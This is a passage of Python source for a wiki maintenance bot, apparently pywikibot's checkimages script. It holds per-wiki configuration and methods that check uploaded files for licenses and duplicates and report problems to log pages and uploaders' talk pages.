'zh': 'User:Alexsh/checkimagereport',
}
# If a template isn't a license but is included on a lot of images, it can
# be skipped when analyzing the image, without taking care of it. (the template
# must be in a list)
# Warning: Don't add templates like "en, de, it" because they are already in
# (added in the code, below).
# Warning 2: The bot will use regex, so make the names compatible, please (don't
# add "Template:" or {{ because they are already put in the regex).
# Warning 3: the part that uses this regex is case-insensitive (just to let you
# know..)
HiddenTemplate = {
# Put the other in the page on the project defined below
'commons': ['Template:Information'],
'meta': ['Template:Information'],
'test': ['Template:Information'],
'ar': ['Template:معلومات'],
'de': ['Template:Information'],
'en': ['Template:Information'],
'fa': ['الگو:اطلاعات'],
'fr': ['Template:Information'],
'ga': ['Template:Information'],
'hr': ['Template:Infoslika'],
'hu': ['Template:Információ', 'Template:Enwiki', 'Template:Azonnali'],
'it': ['Template:EDP', 'Template:Informazioni file',
'Template:Information', 'Template:Trademark',
'Template:Permissionotrs'],
'ja': ['Template:Information'],
'ko': ['Template:그림 정보'],
'ru': ['Template:Изображение',
'Template:Обоснование добросовестного использования'],
'sd': ['Template:معلومات'],
'sr': ['Шаблон:Информација', 'Шаблон:Non-free use rationale 2'],
'ta': ['Template:Information'],
'ur': ['Template:معلومات'],
'zh': ['Template:Information'],
}
# A page where there's a list of templates to skip.
PageWithHiddenTemplates = {
'commons': 'User:Filbot/White_templates#White_templates',
'it': 'Progetto:Coordinamento/Immagini/Bot/WhiteTemplates',
'ko': 'User:Kwjbot_IV/whitetemplates/list',
'sr': 'User:KizuleBot/checkimages.py/дозвољенишаблони',
}
# A page where there's a list of templates to consider as licenses.
PageWithAllowedTemplates = {
'commons': 'User:Filbot/Allowed templates',
'de': 'Benutzer:Xqbot/Lizenzvorlagen',
'it': 'Progetto:Coordinamento/Immagini/Bot/AllowedTemplates',
'ko': 'User:Kwjbot_IV/AllowedTemplates',
'sr': 'User:KizuleBot/checkimages.py/дозвољенишаблони',
}
# Template added when the bot finds only a hidden template and nothing else.
# Note: every __botnick__ will be replaced with your bot's nickname
# (feel free not to use it if you don't need it)
HiddenTemplateNotification = {
'commons': ("\n{{subst:User:Filnik/whitetemplate|File:%s}}\n\n''This "
'message was added automatically by ~~~, if you need '
'some help about it please read the text above again and '
'follow the links in it, if you still need help ask at the '
'[[File:Human-help-browser.svg|18px|link=Commons:Help desk|?]]'
" '''[[Commons:Help desk|→]] [[Commons:Help desk]]''' in any "
"language you like to use.'' --~~~~"),
'it': '{{subst:Progetto:Coordinamento/Immagini/Bot/Messaggi/'
'Template_insufficiente|%s|~~~}} --~~~~',
'ko': '\n{{subst:User:Kwj2772/whitetemplates|%s}} --~~~~',
}
# In this part there are the parameters for the dupe images.
# Put here the template that you want to put in the image to warn that it's a
# dupe. Put __image__ if you want only one image, __images__ if you want the
# whole list.
duplicatesText = {
'commons': '\n{{Dupe|__image__}}',
'de': '{{NowCommons}}',
'it': '\n{{Progetto:Coordinamento/Immagini/Bot/Template duplicati|'
'__images__}}',
'ru': '{{NCT|__image__}}',
'sr': '{{NowCommons|__image__}}',
}
# Message to put in the talk
duplicates_user_talk_text = {
'it': '{{subst:Progetto:Coordinamento/Immagini/Bot/Messaggi/Duplicati|'
'%s|%s|~~~}} --~~~~',
}
# Regex to detect the template put in the image's description to find the dupe
duplicatesRegex = {
'commons': r'\{\{(?:[Tt]emplate:|)(?:[Dd]up(?:licat|)e|[Bb]ad[ _][Nn]ame)'
r'[|}]',
    'de': r'\{\{[nN](?:C|ow(?: c|[cC])ommons)[\|\}]',
'it': r'\{\{(?:[Tt]emplate:|)[Pp]rogetto:[Cc]oordinamento/Immagini/Bot/'
r'Template duplicati[|}]',
    'sr': r'\{\{[nN](?:C|ow(?: c|[cC])ommons)[\|\}]',
}
# Category with the licenses and / or with subcategories with the other
# licenses.
category_with_licenses = {
'commons': 'Category:License tags',
'meta': 'Category:License templates',
'test': 'Category:CC license tags',
'ar': 'تصنيف:قوالب حقوق الصور',
'de': 'Kategorie:Vorlage:Lizenz für Bilder',
'en': 'Category:Wikipedia file copyright templates',
'fa': 'رده:الگو:حق تکثیر پرونده',
'ga': "Catagóir:Clibeanna cóipchirt d'íomhánna",
'it': 'Categoria:Template Licenze copyright',
'ja': 'Category:画像の著作権表示テンプレート',
'ko': '분류:위키백과 그림 저작권 틀',
'ru': 'Category:Шаблоны:Лицензии файлов',
'sd': 'زمرو:وڪيپيڊيا فائل ڪاپي رائيٽ سانچا',
'sr': 'Категорија:Шаблони за слике',
'ta': 'Category:காப்புரிமை வார்ப்புருக்கள்',
'ur': 'زمرہ:ویکیپیڈیا سانچہ جات حقوق تصاویر',
'zh': 'Category:版權申告模板',
}
# Page where is stored the message to send as email to the users
emailPageWithText = {
# 'de': 'Benutzer:ABF/D3',
}
# Title of the email
emailSubject = {
# 'de': 'Problemen mit Deinem Bild auf der Deutschen Wikipedia',
}
# Seems that uploaderBots aren't interested in getting messages regarding the
# files that they upload.. strange, huh?
# Format: [[user,regex], [user,regex]...] the regex is needed to match the user
# to whom the warning message should be sent
uploadBots = {
'commons': [['File Upload Bot (Magnus Manske)',
r'\|[Ss]ource=Transferred from .*?; '
r'transferred to Commons by \[\[User:(.*?)\]\]']],
}
# Service images that don't have to be deleted and/or reported have a template
# inside them (you can leave this param as None)
serviceTemplates = {
'it': ['Template:Immagine di servizio'],
}
# Add your project (in alphabetical order) if you want the bot to run on it
project_inserted = ['ar', 'commons', 'de', 'en', 'fa', 'ga', 'hu', 'it', 'ja',
'ko', 'ru', 'meta', 'sd', 'sr', 'ta', 'test', 'ur', 'zh']
# END OF CONFIGURATION.
SETTINGS_REGEX = re.compile(r"""
<-------\ ------->\n
\*[Nn]ame\ ?=\ ?['"](.*?)['"]\n
\*([Ff]ind|[Ff]indonly)\ ?=\ ?(.*?)\n
\*[Ii]magechanges\ ?=\ ?(.*?)\n
\*[Ss]ummary\ ?=\ ?['"](.*?)['"]\n
\*[Hh]ead\ ?=\ ?['"](.*?)['"]\n
\*[Tt]ext\ ?=\ ?['"](.*?)['"]\n
\*[Mm]ex\ ?=\ ?['"]?([^\n]*?)['"]?\n
""", re.DOTALL | re.VERBOSE)
class LogIsFull(Error):
"""Log is full and the Bot cannot add other data to prevent Errors."""
def printWithTimeZone(message) -> None:
"""Print the messages followed by the TimeZone encoded correctly."""
time_zone = time.strftime('%d %b %Y %H:%M:%S (UTC)', time.gmtime())
pywikibot.output('{} {}'.format(message.rstrip(), time_zone))
class checkImagesBot:
"""A robot to check recently uploaded files."""
def __init__(self, site, logFulNumber=25000, sendemailActive=False,
duplicatesReport=False, logFullError=True,
max_user_notify=None) -> None:
"""Initializer, define some instance variables."""
self.site = site
self.logFullError = logFullError
self.logFulNumber = logFulNumber
self.rep_page = i18n.translate(self.site, report_page)
if not self.rep_page:
raise TranslationError(
'No report page provided in "report_page" dict '
'for your project!')
self.image_namespace = site.namespaces.FILE.custom_name + ':'
self.list_entry = '\n* [[:{}%s]] '.format(self.image_namespace)
# The summary of the report
self.com = i18n.twtranslate(self.site, 'checkimages-log-comment')
hiddentemplatesRaw = i18n.translate(self.site, HiddenTemplate)
if not hiddentemplatesRaw:
raise TranslationError(
'No non-license templates provided in "HiddenTemplate" dict '
'for your project!')
self.hiddentemplates = {
pywikibot.Page(self.site, tmp, ns=self.site.namespaces.TEMPLATE)
for tmp in hiddentemplatesRaw}
self.pageHidden = i18n.translate(self.site, PageWithHiddenTemplates)
self.pageAllowed = i18n.translate(self.site, PageWithAllowedTemplates)
self.comment = i18n.twtranslate(self.site.lang,
'checkimages-source-tag-comment')
# Adding the bot's nickname at the notification text if needed.
self.bots = i18n.translate(self.site, bot_list)
if self.bots:
self.bots.append(site.username())
else:
self.bots = [site.username()]
self.sendemailActive = sendemailActive
self.skip_list = []
self.duplicatesReport = duplicatesReport
if max_user_notify:
self.num_notify = collections.defaultdict(lambda: max_user_notify)
else:
self.num_notify = None
# Load the licenses only once, so do it once
self.list_licenses = self.load_licenses()
def setParameters(self, image) -> None:
"""Set parameters."""
# ensure we have a FilePage
self.image = pywikibot.FilePage(image)
self.imageName = image.title(with_ns=False)
self.timestamp = None
self.uploader = None
def report(self, newtext, image_to_report, notification=None, head=None,
notification2=None, unver=True, commTalk=None, commImage=None
) -> None:
"""Function to make the reports easier."""
self.image_to_report = image_to_report
self.newtext = newtext
if not newtext:
raise TranslationError(
'No no-license template provided in "n_txt" dict '
'for your project!')
self.head = head or ''
self.notification = notification
self.notification2 = notification2
if self.notification:
self.notification = re.sub(r'__botnick__', self.site.username(),
notification)
if self.notification2:
self.notification2 = re.sub(r'__botnick__', self.site.username(),
notification2)
self.commTalk = commTalk
self.commImage = commImage or self.comment
image_tagged = False
try:
image_tagged = self.tag_image(unver)
except NoPageError:
pywikibot.output('The page has been deleted! Skip!')
except EditConflictError:
pywikibot.output('Edit conflict! Skip!')
if image_tagged and self.notification:
try:
self.put_mex_in_talk()
except EditConflictError:
pywikibot.output('Edit Conflict! Retrying...')
try:
self.put_mex_in_talk()
except Exception:
pywikibot.exception()
pywikibot.output(
'Another error... skipping the user...')
def uploadBotChangeFunction(self, reportPageText, upBotArray) -> str:
"""Detect the user that has uploaded the file through upload bot."""
regex = upBotArray[1]
results = re.findall(regex, reportPageText)
if results:
luser = results[0]
return luser
# we can't find the user, report the problem to the bot
return upBotArray[0]
def tag_image(self, put=True) -> bool:
"""Add template to the Image page and find out the uploader."""
# Get the image's description
reportPageObject = pywikibot.FilePage(self.site, self.image_to_report)
try:
reportPageText = reportPageObject.get()
except NoPageError:
pywikibot.output(self.imageName + ' has been deleted...')
return False
        # You can also use this function to find only the user that
        # has uploaded the image (FIXME: rewrite this part a bit)
if put:
pywikibot.showDiff(reportPageText,
self.newtext + '\n' + reportPageText)
pywikibot.output(self.commImage)
try:
reportPageObject.put(self.newtext + '\n' + reportPageText,
summary=self.commImage)
except LockedPageError:
pywikibot.output('File is locked. Skipping.')
return False
        # reportPageObject is the image page object.
try:
if reportPageObject == self.image and self.uploader:
nick = self.uploader
else:
nick = reportPageObject.latest_file_info.user
except PageRelatedError:
pywikibot.output(
'Seems that {} has only the description and not the file...'
.format(self.image_to_report))
repme = self.list_entry + "problems '''with the APIs'''"
self.report_image(self.image_to_report, self.rep_page, self.com,
repme)
return False
upBots = i18n.translate(self.site, uploadBots)
user = pywikibot.User(self.site, nick)
luser = user.title(as_url=True)
if upBots:
for upBot in upBots:
if upBot[0] == luser:
luser = self.uploadBotChangeFunction(reportPageText, upBot)
user = pywikibot.User(self.site, luser)
self.talk_page = user.getUserTalkPage()
self.luser = luser
return True
def put_mex_in_talk(self) -> None:
"""Function to put the warning in talk page of the uploader."""
commento2 = i18n.twtranslate(self.site.lang,
'checkimages-source-notice-comment')
emailPageName = i18n.translate(self.site, emailPageWithText)
emailSubj = i18n.translate(self.site, emailSubject)
if self.notification2:
self.notification2 %= self.image_to_report
else:
self.notification2 = self.notification
second_text = False
# Getting the talk page's history, to check if there is another
# advise...
try:
testoattuale = self.talk_page.get()
history = list(self.talk_page.revisions(total=10))
latest_user = history[0]['user']
pywikibot.output(
'The latest user that has written something is: '
+ latest_user)
# A block to prevent the second message if the bot also
# welcomed users...
if latest_user in self.bots and len(history) > 1:
second_text = True
except IsRedirectPageError:
pywikibot.output(
'The user talk is a redirect, trying to get the right talk...')
try:
self.talk_page = self.talk_page.getRedirectTarget()
testoattuale = self.talk_page.get()
except NoPageError:
testoattuale = i18n.translate(self.site, empty)
except NoPageError:
pywikibot.output('The user page is blank')
testoattuale = i18n.translate(self.site, empty)
if self.commTalk:
commentox = self.commTalk
else:
commentox = commento2
if second_text:
newText = '{}\n\n{}'.format(testoattuale, self.notification2)
else:
newText = '{}\n\n== {} ==\n{}'.format(testoattuale, self.head,
self.notification)
# Check maximum number of notifications for this talk page
if (self.num_notify is not None
and self.num_notify[self.talk_page.title()] == 0):
pywikibot.output('Maximum notifications reached, skip.')
return
try:
self.talk_page.put(newText, summary=commentox, minor=False)
except LockedPageError:
pywikibot.output('Talk page blocked, skip.')
else:
if self.num_notify is not None:
self.num_notify[self.talk_page.title()] -= 1
if emailPageName and emailSubj:
emailPage = pywikibot.Page(self.site, emailPageName)
try:
emailText = emailPage.get()
except (NoPageError, IsRedirectPageError):
return
if self.sendemailActive:
text_to_send = re.sub(r'__user-nickname__', r'{}'
.format(self.luser), emailText)
emailClass = pywikibot.User(self.site, self.luser)
try:
emailClass.send_email(emailSubj, text_to_send)
except NotEmailableError:
pywikibot.output('User is not mailable, aborted')
def regexGenerator(self, regexp, textrun) -> Generator[pywikibot.FilePage,
None, None]:
"""Find page to yield using regex to parse text."""
regex = re.compile(r'{}'.format(regexp), re.DOTALL)
results = regex.findall(textrun)
for image in results:
yield pywikibot.FilePage(self.site, image)
def loadHiddenTemplates(self) -> None:
"""Function to load the white templates."""
        # A template such as {{en is not a license! Add these to the
        # whitelist templates as well...
for langK in Family.load('wikipedia').langs.keys():
self.hiddentemplates.add(pywikibot.Page(
self.site, 'Template:{}'.format(langK)))
# Hidden template loading
if self.pageHidden:
try:
pageHiddenText = pywikibot.Page(self.site,
self.pageHidden).get()
except (NoPageError, IsRedirectPageError):
pageHiddenText = ''
for element in self.load(pageHiddenText):
self.hiddentemplates.add(pywikibot.Page(self.site, element))
def important_image(self, listGiven) -> pywikibot.FilePage:
"""
Get tuples of image and time, return the most used or oldest image.
:param listGiven: a list of tuples which hold seconds and FilePage
:type listGiven: list
:return: the most used or oldest image
"""
# find the most used image
inx_found = None # index of found image
max_usage = 0 # hold max amount of using pages
for num, element in enumerate(listGiven):
image = element[1]
image_used = len(list(image.usingPages()))
if image_used > max_usage:
max_usage = image_used
inx_found = num
if inx_found is not None:
return listGiven[inx_found][1]
# find the oldest image
sec, image = max(listGiven, key=lambda element: element[0])
return image
def checkImageOnCommons(self) -> bool:
"""Checking if the file is on commons."""
pywikibot.output('Checking if [[{}]] is on commons...'
.format(self.imageName))
try:
hash_found = self.image.latest_file_info.sha1
except NoPageError:
return False # Image deleted, no hash found. Skip the image.
site = pywikibot.Site('commons', 'commons')
commons_image_with_this_hash = next(
iter(site.allimages(sha1=hash_found, total=1)), None)
if commons_image_with_this_hash:
servTMP = pywikibot.translate(self.site, serviceTemplates)
templatesInTheImage = self.image.templates()
if servTMP is not None:
for template in servTMP:
if pywikibot.Page(self.site,
template) in templatesInTheImage:
pywikibot.output(
"{} is on commons but it's a service image."
.format(self.imageName))
return True # continue with the check-part
pywikibot.output(self.imageName + ' is on commons!')
if self.image.file_is_shared():
pywikibot.output(
"But, the file doesn't exist on your project! Skip...")
# We have to skip the check part for that image because
# it's on commons but someone has added something on your
# project.
return False
if re.findall(r'\bstemma\b', self.imageName.lower()) and \
self.site.code == 'it':
pywikibot.output(
"{} has 'stemma' inside, means that it's ok."
.format(self.imageName))
return True
# It's not only on commons but the image needs a check
# the second usually is a url or something like that.
# Compare the two in equal way, both url.
repme = ((self.list_entry
+ "is also on '''Commons''': [[commons:File:%s]]")
% (self.imageName,
commons_image_with_this_hash.title(
with_ns=False)))
if (self.image.title(as_url=True)
== commons_image_with_this_hash.title(as_url=True)):
repme += ' (same name)'
self.report_image(self.imageName, self.rep_page, self.com, repme,
addings=False)
return True
def checkImageDuplicated(self, duplicates_rollback) -> bool:
"""Function to check the duplicated files."""
dupText = i18n.translate(self.site, duplicatesText)
dupRegex = i18n.translate(self.site, duplicatesRegex)
dupTalkText = i18n.translate(self.site, duplicates_user_talk_text)
# Head of the message given to the author
dupTalkHead = i18n.twtranslate(self.site, 'checkimages-doubles-head')
# Comment while bot reports the problem in the uploader's talk
dupComment_talk = i18n.twtranslate(self.site,
'checkimages-doubles-talk-comment')
# Comment used by the bot while it reports the problem in the image
dupComment_image = i18n.twtranslate(self.site,
'checkimages-doubles-file-comment')
imagePage = pywikibot.FilePage(self.site, self.imageName)
hash_found = imagePage.latest_file_info.sha1
duplicates = list(self.site.allimages(sha1=hash_found))
if not duplicates:
return False # Image deleted, no hash found. Skip the image.
if len(duplicates) > 1:
xdict = {'en':
'%(name)s has {{PLURAL:count'
'|a duplicate! Reporting it'
'|%(count)s duplicates! Reporting them}}...'}
pywikibot.output(i18n.translate('en', xdict,
{'name': self.imageName,
'count': len(duplicates) - 1}))
if dupText and dupRegex:
time_image_list = []
for dup_page in duplicates:
if (dup_page.title(as_url=True) != self.image.title(
as_url=True)
or self.timestamp is None):
try:
self.timestamp = (
dup_page.latest_file_info.timestamp)
except PageRelatedError:
continue
data = self.timestamp.timetuple()
data_seconds = time.mktime(data)
time_image_list.append([data_seconds, dup_page])
Page_older_image = self.important_image(time_image_list)
older_page_text = Page_older_image.text
# And if the images are more than two?
string = ''
images_to_tag_list = []
for dup_page in duplicates:
if dup_page == Page_older_image:
# the most used or oldest image
# not report also this as duplicate
continue
try:
DupPageText = dup_page.text
except NoPageError:
continue
if not (re.findall(dupRegex, DupPageText)
or re.findall(dupRegex, older_page_text)):
pywikibot.output(
'{} is a duplicate and has to be tagged...'
.format(dup_page))
images_to_tag_list.append(dup_page.title())
string += '* {}\n'.format(
dup_page.title(as_link=True, textlink=True))
else:
pywikibot.output(
"Already put the dupe-template in the files's page"
" or in the dupe's page. Skip.")
return False # Ok - Let's continue the checking phase
            # true if the images are not to be tagged as dupes
only_report = False
# put only one image or the whole list according to the request
if '__images__' in dupText:
text_for_the_report = dupText.replace(
'__images__',
'\n{}* {}\n'.format(
string,
Page_older_image.title(
as_link=True, textlink=True)))
else:
text_for_the_report = dupText.replace(
'__image__',
Page_older_image.title(as_link=True, textlink=True))
            # Two iterations: report the "problem" to the user only once
# (the last)
if len(images_to_tag_list) > 1:
for image_to_tag in images_to_tag_list[:-1]:
fp = pywikibot.FilePage(self.site, image_to_tag)
already_reported_in_past = fp.revision_count(self.bots)
# if you want only one edit, the edit found should be
# more than 0 -> num - 1
if already_reported_in_past > duplicates_rollback - 1:
only_report = True
break
                    # Remove the image from the list we are writing to
image = self.image_namespace + image_to_tag
text_for_the_report = re.sub(
r'\n\*\[\[:{}\]\]'.format(re.escape(image)),
'', text_for_the_report)
self.report(text_for_the_report, image_to_tag,
commImage=dupComment_image, unver=True)
if images_to_tag_list and not only_report:
fp = pywikibot.FilePage(self.site, images_to_tag_list[-1])
already_reported_in_past = fp.revision_count(self.bots)
image_title = re.escape(self.image.title(as_url=True))
from_regex = (r'\n\*\[\[:{}{}\]\]'
.format(self.image_namespace, image_title))
                # Remove the image from the list we are writing to
text_for_the_report = re.sub(from_regex, '',
text_for_the_report)
# if you want only one edit, the edit found should be more
# than 0 -> num - 1
if already_reported_in_past > duplicates_rollback - 1 or \
not dupTalkText:
only_report = True
else:
self.report(
text_for_the_report, images_to_tag_list[-1],
dupTalkText
% (Page_older_image.title(with_ns=True),
string),
dupTalkHead, commTalk=dupComment_talk,
commImage=dupComment_image, unver=True)
if self.duplicatesReport or only_report:
if only_report:
repme = ((self.list_entry + 'has the following duplicates '
"('''forced mode'''):")
% self.image.title(as_url=True))
else:
repme = (
(self.list_entry + 'has the following duplicates:')
% self.image.title(as_url=True))
for dup_page in duplicates:
if (dup_page.title(as_url=True)
== self.image.title(as_url=True)):
# the image itself, not report also this as duplicate
continue
repme += '\n** [[:{}{}]]'.format(
self.image_namespace, dup_page.title(as_url=True))
result = self.report_image(self.imageName, self.rep_page,
self.com, repme, addings=False)
if not result:
return True # If Errors, exit (but continue the check)
if Page_older_image.title() != self.imageName:
# The image is a duplicate, it will be deleted. So skip the
# check-part, useless
return False
return True # Ok - No problem. Let's continue the checking phase
def report_image(self, image_to_report, rep_page=None, com=None,
rep_text=None, addings=True) -> bool:
"""Report the files to the report page when needed."""
rep_page = rep_page or self.rep_page
com = com or self.com
rep_text = rep_text or self.list_entry + '~~~~~'
if addings:
# Adding the name of the image in the report if not done already
rep_text = rep_text % image_to_report
another_page = pywikibot.Page(self.site, rep_page)
try:
text_get = another_page.get()
except NoPageError:
text_get = ''
except IsRedirectPageError:
text_get = another_page.getRedirectTarget().get()
# Don't care for differences inside brackets.
end = rep_text.find('(', max(0, rep_text.find(']]')))
if end < 0:
end = None
short_text = rep_text[rep_text.find('[['):end].strip()
reported = True
# Skip if the message is already there.
if short_text in text_get:
pywikibot.output('{} is already in the report page.'
.format(image_to_report))
reported = False
elif len(text_get) >= self.logFulNumber:
if self.logFullError:
raise LogIsFull(
'The log page ({}) is full! Please delete the old files '
'reported.'.format(another_page.title()))
pywikibot.output(
'The log page ({}) is full! Please delete the old files '
                'reported. Skip!'.format(another_page.title()))
# Don't report, but continue with the check
# (we don't know if this is the first time we check this file
# or not)
else:
# Adding the log
another_page.put(text_get + rep_text, summary=com, force=True,
minor=False)
pywikibot.output('...Reported...')
return reported
def takesettings(self) -> None:
"""Function to take the settings from the wiki."""
settingsPage = i18n.translate(self.site, page_with_settings)
try:
if not settingsPage:
self.settingsData = None
else:
wikiPage = pywikibot.Page(self.site, settingsPage)
self.settingsData = []
try:
testo = wikiPage.get()
number = 1
for m in SETTINGS_REGEX.finditer(testo):
name = str(m.group(1))
find_tipe = str(m.group(2))
find = str(m.group(3))
imagechanges = str(m.group(4))
summary = str(m.group(5))
head = str(m.group(6))
text = str(m.group(7))
mexcatched = str(m.group(8))
tupla = [number, name, find_tipe, find, imagechanges,
summary, head, text, mexcatched]
self.settingsData += [tupla]
number += 1
if not self.settingsData:
                        pywikibot.output(
                            "You've set your settings wrongly; please take a "
                            'look at the settings page. (run without them)')
self.settingsData = None
except NoPageError:
pywikibot.output("The settings' page doesn't exist!")
self.settingsData = None
except Error:
pywikibot.output(
                'Problems with loading the settings, run without them.')
self.settingsData = None
self.some_problem = False
if not self.settingsData:
self.settingsData = None
# Real-Time page loaded
if self.settingsData:
pywikibot.output('>> Loaded the real-time page... <<')
else:
pywikibot.output('>> No additional settings found! <<')
def load_licenses(self) -> List[pywikibot.Page]:
"""Load the list of the licenses."""
catName = i18n.translate(self.site, category_with_licenses)
if not catName:
raise TranslationError(
'No allowed licenses category provided in '
'"category_with_licenses" dict for your project!')
pywikibot.output('\nLoading the allowed licenses...\n')
cat = pywikibot.Category(self.site, catName)
list_licenses = list(cat.articles())
if self.site.code == 'commons':
no_licenses_to_skip = pywikibot.Category(self.site,
'License-related tags')
for license_given in no_licenses_to_skip.articles():
if license_given in list_licenses:
list_licenses.remove(license_given)
pywikibot.output('')
# Add the licenses set in the default page as licenses to check
if self.pageAllowed:
try:
pageAllowedText = pywikibot.Page(self.site,
self.pageAllowed).get()
except (NoPageError, IsRedirectPageError):
pageAllowedText = ''
for nameLicense in self.load(pageAllowedText):
pageLicense = pywikibot.Page(self.site, nameLicense)
if pageLicense not in list_licenses:
# the list has wiki-pages
list_licenses.append(pageLicense)
return list_licenses
def miniTemplateCheck(self, template) -> bool:
"""Check if template is in allowed licenses or in licenses to skip."""
# the list_licenses are loaded in the __init__
        # (not to load them multiple times)
if template in self.list_licenses:
self.license_selected = template.title(with_ns=False)
self.seems_ok = True
# let the last "fake" license normally detected
self.license_found = self.license_selected
return True
if template in self.hiddentemplates:
# if the whitetemplate is not in the images description, we don't
# care
try:
self.allLicenses.remove(template)
except ValueError:
return False
else:
self.whiteTemplatesFound = True
return False
def templateInList(self) -> None:
"""
Check if template is in list.
        The problem is the calls to the MediaWiki system, because they can be
        pretty slow, while searching in a list of objects is really fast; so
        first of all let's see if we can find something in the info that we
        already have, then make a deeper check.
"""
for template in self.licenses_found:
if self.miniTemplateCheck(template):
break
if not self.license_found:
for template in self.licenses_found:
if template.isRedirectPage():
template = template.getRedirectTarget()
if self.miniTemplateCheck(template):
break
def smartDetection(self) -> Tuple[str, bool]:
"""
Detect templates.
        Instead of checking only whether there is a simple template in the
        image's description, the bot also checks whether that template is a
        license or something else. In this sense this type of check is smart.
"""
self.seems_ok = False
self.license_found = None
self.whiteTemplatesFound = False
regex_find_licenses = re.compile(
r'(?<!\{)\{\{(?:[Tt]emplate:|)([^{]+?)[|\n<}]', re.DOTALL)
regex_are_licenses = re.compile(
r'(?<!\{)\{\{(?:[Tt]emplate:|)([^{]+?)\}\}', re.DOTALL)
while True:
self.loadHiddenTemplates()
self.licenses_found = self.image.templates()
templatesInTheImageRaw = regex_find_licenses.findall(
self.imageCheckText)
if not self.licenses_found and templatesInTheImageRaw:
# {{nameTemplate|something <- this is not a template, be sure
                # that we haven't caught something like that.
licenses_TEST = regex_are_licenses.findall(self.imageCheckText)
if not self.licenses_found and licenses_TEST:
raise Error(
"Invalid or broken templates found in the image's "
'page {}!'.format(self.image))
self.allLicenses = []
if not self.list_licenses:
raise TranslationError(
'No allowed licenses found in "category_with_licenses" '
'category for your project!')
# Found the templates ONLY in the image's description
for template_selected in templatesInTheImageRaw:
tp = pywikibot.Page(self.site, template_selected)
for templateReal in self.licenses_found:
if (tp.title(as_url=True, with_ns=False).lower()
== templateReal.title(as_url=True,
with_ns=False).lower()):
if templateReal not in self.allLicenses:
self.allLicenses.append(templateReal)
break
if self.licenses_found:
self.templateInList()
if not self.license_found and self.allLicenses:
self.allLicenses = [
template.getRedirectTarget()
if template.isRedirectPage() else template
for template in self.allLicenses if template.exists()]
if self.allLicenses:
self.license_found = self.allLicenses[0].title()
# If it has "some_problem" it must check the additional settings.
self.some_problem = False
if self.settingsData:
# use additional settings
self.findAdditionalProblems()
if self.some_problem:
if self.mex_used in self.imageCheckText:
pywikibot.output('File already fixed. Skipping.')
else:
pywikibot.output(
"The file's description for {} contains {}..."
.format(self.imageName, self.name_used))
if self.mex_used.lower() == 'default':
self.mex_used = self.unvertext
if self.imagestatus_used:
reported = True
else:
reported = self.report_image(self.imageName)
if reported:
self.report(self.mex_used, self.imageName, self.text_used,
self.head_used, None,
self.imagestatus_used, self.summary_used)
else:
pywikibot.output('Skipping the file...')
self.some_problem = False
else:
if not self.seems_ok and self.license_found:
rep_text_license_fake = ((self.list_entry
+ "seems to have a ''fake license'',"
' license detected:'
' <nowiki>%s</nowiki>') %
(self.imageName, self.license_found))
printWithTimeZone(
'{} seems to have a fake license: {}, reporting...'
.format(self.imageName, self.license_found))
self.report_image(self.imageName,
rep_text=rep_text_license_fake,
addings=False)
elif self.license_found:
pywikibot.output('[[%s]] seems ok, license found: {{%s}}...'
% (self.imageName, self.license_found))
return (self.license_found, self.whiteTemplatesFound)
def load(self, raw) -> List[str]:
"""Load a list of objects from a string using regex."""
list_loaded = []
        # I search with a regex for the quoted items and put them in a list
        # (I find it easier and safer this way)
regl = r"(\"|\')(.*?)\1(?:,|\])"
pl = re.compile(regl)
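        # Illustrative example (not in the original): given the raw text
        # "['Template:Foo', 'Template:Bar']" the loop below returns the list
        # ['Template:Foo', 'Template:Bar'].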
for xl in pl.finditer(raw):
word = xl.group(2).replace('\\\\', '\\')
if word not in list_loaded:
list_loaded.append(word)
return list_loaded
def skipImages(self, skip_number, limit) -> bool:
"""Given a number of files, skip the first -number- files."""
        # If there are more images to skip than images to check, make them the
        # same number
if skip_number == 0:
pywikibot.output('\t\t>> No files to skip...<<')
return False
if skip_number > limit:
skip_number = limit
        # Print a starting message only if no images have been skipped
if not self.skip_list:
pywikibot.output(
i18n.translate(
'en',
'Skipping the first {{PLURAL:num|file|%(num)s files}}:\n',
{'num': skip_number}))
# If we still have pages to skip:
if len(self.skip_list) < skip_number:
pywikibot.output('Skipping {}...'.format(self.imageName))
self.skip_list.append(self.imageName)
if skip_number == 1:
pywikibot.output('')
return True
pywikibot.output('')
return False
@staticmethod
def wait(generator, wait_time) -> Generator[pywikibot.FilePage, None,
None]:
"""
        Skip the images uploaded less than x seconds ago.
        Let the users fix the image's problems on their own in the first x seconds.
"""
printWithTimeZone(
'Skipping the files uploaded less than {} seconds ago..'
.format(wait_time))
for page in generator:
image = pywikibot.FilePage(page)
try:
timestamp = image.latest_file_info.timestamp
except PageRelatedError:
continue
now = pywikibot.Timestamp.utcnow()
delta = now - timestamp
if delta.total_seconds() > wait_time:
yield image
            else:
                if delta.days > 0:
                    pywikibot.warning(
                        'Skipping {}, uploaded {} days ago..'
                        .format(image.title(), delta.days))
                else:
                    pywikibot.warning(
                        'Skipping {}, uploaded {} seconds ago..'
                        .format(image.title(), delta.seconds))
def isTagged(self) -> bool:
"""Understand if a file is already tagged or not."""
# TODO: enhance and use textlib.MultiTemplateMatchBuilder
# Is the image already tagged? If yes, no need to double-check, skip
no_license = i18n.translate(self.site, txt_find)
if not no_license:
raise TranslationError(
'No no-license templates provided in "txt_find" dict '
'for your project!')
for i in no_license:
            # If there is a {{ use regex, otherwise don't (if there is no
            # {{ it may not be a template and the regex would be wrong)
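            # e.g. (illustrative): '{{no license' becomes the pattern
            # r'\{\{(?:template)?no[ _]license ?(?:\||\r?\n|\}|<|/) ?'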
if '{{' in i:
regexP = re.compile(
r'\{\{(?:template)?%s ?(?:\||\r?\n|\}|<|/) ?'
% i.split('{{')[1].replace(' ', '[ _]'), re.I)
result = regexP.findall(self.imageCheckText)
if result:
return True
elif i.lower() in self.imageCheckText:
return True
return False
def findAdditionalProblems(self) -> None:
"""Extract additional settings from configuration page."""
# In every tuple there's a setting configuration
for tupla in self.settingsData:
name = tupla[1]
find_tipe = tupla[2]
find = tupla[3]
find_list = self.load(find)
imagechanges = tupla[4]
if imagechanges.lower() == 'false':
imagestatus = False
elif imagechanges.lower() == 'true':
imagestatus = True
else:
pywikibot.error('Imagechanges set wrongly!')
self.settingsData = None
break
summary = tupla[5]
head_2 = tupla[6]
if head_2.count('==') == 2:
head_2 = re.findall(r'\s*== *(.+?) *==\s*', head_2)[0]
text = tupla[7] % self.imageName
mexCatched = tupla[8]
for k in find_list:
if find_tipe.lower() == 'findonly':
searchResults = re.findall(r'{}'.format(k.lower()),
self.imageCheckText.lower())
if searchResults:
if searchResults[0] == self.imageCheckText.lower():
self.some_problem = True
self.text_used = text
